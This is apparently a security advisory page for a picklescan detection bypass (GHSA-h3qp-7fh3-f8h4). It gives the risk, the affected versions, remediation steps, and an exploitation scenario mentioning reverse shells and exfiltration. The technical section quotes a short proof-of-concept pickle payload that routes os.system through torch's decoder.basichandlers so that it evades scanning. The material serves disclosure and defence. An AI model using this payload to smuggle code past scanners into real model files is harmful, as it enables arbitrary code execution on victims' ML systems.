GHSA-h3qp-7fh3-f8h4: picklescan: detection bypass via PyTorch proxy RCE

GHSA-h3qp-7fh3-f8h4 MEDIUM
Published August 22, 2025
CISO Take

Any MLOps pipeline using picklescan to gate model loading is exposed: attackers can distribute malicious pickle files that pass the scan clean and execute arbitrary code on load. Upgrade picklescan to v0.0.28 immediately and audit any model files validated with older versions. Until patched, treat all externally-sourced pickle files as untrusted regardless of scan results—consider switching to safetensors format for model storage.

Risk Assessment

Despite a medium CVSS label (no vector scored), operational risk for AI/ML environments is HIGH. The attack exploits false trust in a dedicated security control, which is far more dangerous than a straightforward RCE—victims explicitly believe they are protected. The PoC is trivial to implement, requires no special privileges, and targets a widespread pattern in MLOps pipelines (scan-then-load). Any team that has operationalized picklescan as a security gate is directly exposed.

Affected Systems

Package Ecosystem Vulnerable Range Patched
picklescan pip <= 0.0.27 0.0.28
401 3 dependents Pushed 2mo ago 95% patched ~12d to patch Full package profile →

Do you use picklescan? You're affected.

Severity & Risk

CVSS 3.1
N/A
EPSS
N/A
Exploitation Status
No known exploitation
Sophistication
Trivial

Recommended Action

6 steps
  1. PATCH

    Upgrade picklescan to v0.0.28 on all systems—this is the only complete fix.

  2. AUDIT

    Re-scan any pickle files previously cleared by picklescan <= 0.0.27; treat them as potentially compromised.

  3. ARCHITECTURE

    Migrate model serialization to safetensors or ONNX where feasible—these formats are not affected by pickle deserialization attacks.

  4. SANDBOXING

    Load pickle files in isolated environments (containers with no network, minimal filesystem access, dropped privileges) regardless of scan results.

  5. DETECTION

    Alert on picklescan processes using versions < 0.0.28; monitor for unexpected process spawning (e.g., os.system calls) during model load operations.

  6. SUPPLY CHAIN

    Enforce model provenance checks (checksums, signed artifacts) in addition to content scanning.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Art. 15 - Accuracy, robustness and cybersecurity
ISO 42001
8.4 - AI system supply chain
NIST AI RMF
GOVERN 6.2 - Policies and procedures for AI supply chain risk
OWASP LLM Top 10
LLM05:2025 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is GHSA-h3qp-7fh3-f8h4?

Any MLOps pipeline using picklescan to gate model loading is exposed: attackers can distribute malicious pickle files that pass the scan clean and execute arbitrary code on load. Upgrade picklescan to v0.0.28 immediately and audit any model files validated with older versions. Until patched, treat all externally-sourced pickle files as untrusted regardless of scan results—consider switching to safetensors format for model storage.

Is GHSA-h3qp-7fh3-f8h4 actively exploited?

No confirmed active exploitation of GHSA-h3qp-7fh3-f8h4 has been reported, but organizations should still patch proactively.

How to fix GHSA-h3qp-7fh3-f8h4?

1. PATCH: Upgrade picklescan to v0.0.28 on all systems—this is the only complete fix. 2. AUDIT: Re-scan any pickle files previously cleared by picklescan <= 0.0.27; treat them as potentially compromised. 3. ARCHITECTURE: Migrate model serialization to safetensors or ONNX where feasible—these formats are not affected by pickle deserialization attacks. 4. SANDBOXING: Load pickle files in isolated environments (containers with no network, minimal filesystem access, dropped privileges) regardless of scan results. 5. DETECTION: Alert on picklescan processes using versions < 0.0.28; monitor for unexpected process spawning (e.g., os.system calls) during model load operations. 6. SUPPLY CHAIN: Enforce model provenance checks (checksums, signed artifacts) in addition to content scanning.

What systems are affected by GHSA-h3qp-7fh3-f8h4?

This vulnerability affects the following AI/ML architecture patterns: training pipelines, model serving, ML model registries, MLOps CI/CD pipelines, data science platforms with user uploads.

What is the CVSS score for GHSA-h3qp-7fh3-f8h4?

No CVSS score has been assigned yet.

Technical Details

NVD Description

### Summary Using torch.utils.data.datapipes.utils.decoder.basichandlers function, which is a pytorch library function to execute remote pickle file. ### Details The attack payload executes in the following steps: First, the attacker craft the payload by calling to torch.utils.data.datapipes.utils.decoder.basichandlers function in reduce method Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution. ### PoC ``` import torch.utils.data.datapipes.utils.decoder as decoder class EvilTorchUtilsDataDatapipesDecoder: def __reduce__(self): extension = 'pickle' class RCE: def __reduce__(self): return os.system, ('whoami',) data = pickle.dumps(RCE()) return decoder.basichandlers, (extension, data) ``` ### Impact Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models. What is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded. Supply Chain Attack: Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects. ### Corresponding https://github.com/FredericDT https://github.com/Qhaoduoyu

Exploitation Scenario

An adversary publishes a PyTorch model checkpoint to a public registry or contributes it to an open-source project. The payload embeds a malicious __reduce__ method that delegates to torch.utils.data.datapipes.utils.decoder.basichandlers—a legitimate PyTorch function not on picklescan's blocklist. The victim's MLOps pipeline fetches the model, runs picklescan validation (result: CLEAN), and proceeds to load it via pickle.load() in a training job or inference service. At load time, the embedded payload executes arbitrary OS commands—establishing a reverse shell, exfiltrating model weights, injecting backdoors into downstream artifacts, or pivoting to cloud infrastructure via the ML worker's IAM role.

Timeline

Published
August 22, 2025
Last Modified
August 22, 2025
First Seen
March 24, 2026

Related Vulnerabilities